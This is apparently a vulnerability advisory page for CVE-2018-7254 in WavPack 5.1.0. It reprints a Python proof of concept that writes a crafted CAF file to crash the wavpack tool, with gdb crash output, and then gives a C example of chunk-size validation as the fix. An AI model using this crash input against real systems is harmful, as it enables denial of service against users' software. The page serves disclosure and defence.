WavPack Buffer Error Vulnerability

Vulnerability ID: 1124839    Vulnerability type: Buffer error
Published: 2018-02-21    Updated: 2019-10-23
CVE: CVE-2018-7254    CNNVD ID: CNNVD-201802-799
Platform: Multiple    CVSS score: 6.8
|Source
https://www.exploit-db.com/exploits/44154
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201802-799
|Vulnerability details
WavPack is a free, open-source lossless audio compression suite. The 'ParseCaffHeaderConfig' function in cli/caff.c in WavPack 5.1.0 contains a buffer error vulnerability. A remote attacker can exploit it with a maliciously crafted CAF file to cause a denial of service (out-of-bounds buffer read) or a memory allocation error.
|Vulnerability EXP
# Exploit title: Wavpack 5.1.0 - Denial of Service
# Date: 20.02.2018
# Exploit Author: r4xis
# https://github.com/r4xis
#
# Vendor Homepage:  http://www.wavpack.com/
# Software Links:   http://www.wavpack.com/downloads.html
#                   https://github.com/dbry/WavPack
#
#
# Version: Wavpack 5.1.0
# Tested on:    Debian 9.3.0 64 bit
#               Windows 7 32 bit and 64 bit
#               Windows 8 64 bit
#
#
# CVE: CVE-2018-7254
# CVE Details:
# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
# https://github.com/dbry/WavPack/issues/26


import os

# The CAF image is built from byte strings and written in binary mode so that
# the 0x80 byte at offset 0xa0 reaches the file verbatim (a text-mode str write
# under Python 3 would UTF-8 encode it as two bytes and change the layout).
head = b"\x63\x61\x66\x66"        # "caff" file magic
version = b"\x00\x01"             # CAF file version 1
junk1 = b"\x00" * (0xa0 - 6)      # zero padding up to offset 0xa0
crash = b"\x80"                   # the single byte that triggers the crash
junk2 = b"\x00" * 100             # trailing zero padding

with open("poc.caf", "wb") as f:
    f.write(head + version + junk1 + crash + junk2)

os.system("wavpack poc.caf")

'''
Debian gdb output:
Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms ()
    at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
333	../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
'''
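The defensive check this bug class calls for is to validate a chunk's declared size against the bytes actually remaining in the input, and against a sane cap, before anything is allocated or copied. The C program below is an added example, not code from the page or from the WavPack project: it walks an in-memory CAF chunk list (8-byte file header, then 4-byte type plus 8-byte big-endian size per chunk) and is run over two constructed images, one laid out exactly like the PoC above and one well-formed one. In the PoC layout, offset 0xa0 falls inside the size field of the thirteenth zero-length chunk header, so the walker reads a declared size of 0x80000000 and rejects it instead of feeding it to malloc()/memcpy(). The function and constant names, the 16 MiB cap, and the simplified walk (no desc chunk semantics) are assumptions of this example.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Result codes for the chunk walker (hypothetical names). */
enum caf_status {
    CAF_OK = 0,
    CAF_ERR_SHORT = 1,       /* input shorter than the 8-byte file header */
    CAF_ERR_MAGIC = 2,       /* missing "caff" magic */
    CAF_ERR_CHUNK_SIZE = 3,  /* declared size exceeds remaining bytes or the cap */
    CAF_ERR_TRAILING = 4     /* trailing bytes too short to be a chunk header */
};

/* Assumed policy cap on any single chunk buffered in memory (hypothetical). */
#define CAF_MAX_BUFFERED_CHUNK (16u * 1024u * 1024u)

/* CAF stores integers big-endian; read the 8-byte chunk size as unsigned. */
static uint64_t rd_be64(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v = (v << 8) | p[i];
    return v;
}

/* Walk the chunk list of an in-memory CAF image. The declared size is checked
 * against the bytes left in the buffer and against the cap before any malloc()
 * or memcpy(), so a crafted size with the high bit set cannot drive either.
 * On return *nchunks holds the number of chunks accepted before stopping. */
int caf_walk_chunks(const uint8_t *buf, size_t len, size_t *nchunks)
{
    size_t pos, count = 0;
    int status = CAF_OK;

    if (len < 8) return CAF_ERR_SHORT;
    if (memcmp(buf, "caff", 4) != 0) return CAF_ERR_MAGIC;
    pos = 8;                                   /* magic + version + flags */

    while (pos + 12 <= len) {                  /* 4-byte type + 8-byte size */
        uint64_t size = rd_be64(buf + pos + 4);
        pos += 12;

        /* Bound the size first: remaining input, then the buffering cap. */
        if (size > (uint64_t)(len - pos) || size > CAF_MAX_BUFFERED_CHUNK) {
            status = CAF_ERR_CHUNK_SIZE;
            break;
        }
        if (size > 0) {
            /* Only now is the narrowing to size_t and the copy safe. */
            uint8_t *copy = malloc((size_t)size);
            if (!copy) { status = CAF_ERR_CHUNK_SIZE; break; }
            memcpy(copy, buf + pos, (size_t)size);
            free(copy);
        }
        pos += (size_t)size;
        count++;
    }
    if (nchunks) *nchunks = count;
    if (status != CAF_OK) return status;
    return pos == len ? CAF_OK : CAF_ERR_TRAILING;
}

/* Constructed image with the PoC's layout: "caff", version 0x0001, zeros up
 * to offset 0xa0, one 0x80 byte, then 100 more zeros. Returns its length. */
size_t build_crafted_image(uint8_t *out, size_t cap)
{
    size_t n = 4 + 2 + (0xa0 - 6) + 1 + 100;  /* 261 bytes */
    if (cap < n) return 0;
    memset(out, 0, n);
    memcpy(out, "caff", 4);
    out[5] = 0x01;
    out[0xa0] = 0x80;
    return n;
}

/* Constructed well-formed image: header, 32-byte desc chunk, 4-byte data chunk. */
size_t build_benign_image(uint8_t *out, size_t cap)
{
    size_t n = 8 + 12 + 32 + 12 + 4;           /* 68 bytes */
    if (cap < n) return 0;
    memset(out, 0, n);
    memcpy(out, "caff", 4);
    out[5] = 0x01;
    memcpy(out + 8, "desc", 4);
    out[8 + 11] = 32;                          /* low byte of big-endian size */
    memcpy(out + 52, "data", 4);
    out[52 + 11] = 4;
    return n;
}

int main(void)
{
    uint8_t img[512];
    size_t n, chunks;

    n = build_crafted_image(img, sizeof img);
    printf("crafted: status=%d chunks=%zu\n", caf_walk_chunks(img, n, &chunks), chunks);
    n = build_benign_image(img, sizeof img);
    printf("benign:  status=%d chunks=%zu\n", caf_walk_chunks(img, n, &chunks), chunks);
    return 0;
}
```

The order of the checks matters: the comparison is done on the full unsigned 64-bit value before it is narrowed, so a size whose high bit is set is rejected rather than turning into a negative or wrapped length somewhere downstream.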
|References

Source: MISC
Link: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
Source: MISC
Link: https://github.com/dbry/WavPack/commit/8e3fe45a7bac31d9a3b558ae0079e2d92a04799e
Source: MISC
Link: https://github.com/dbry/WavPack/issues/26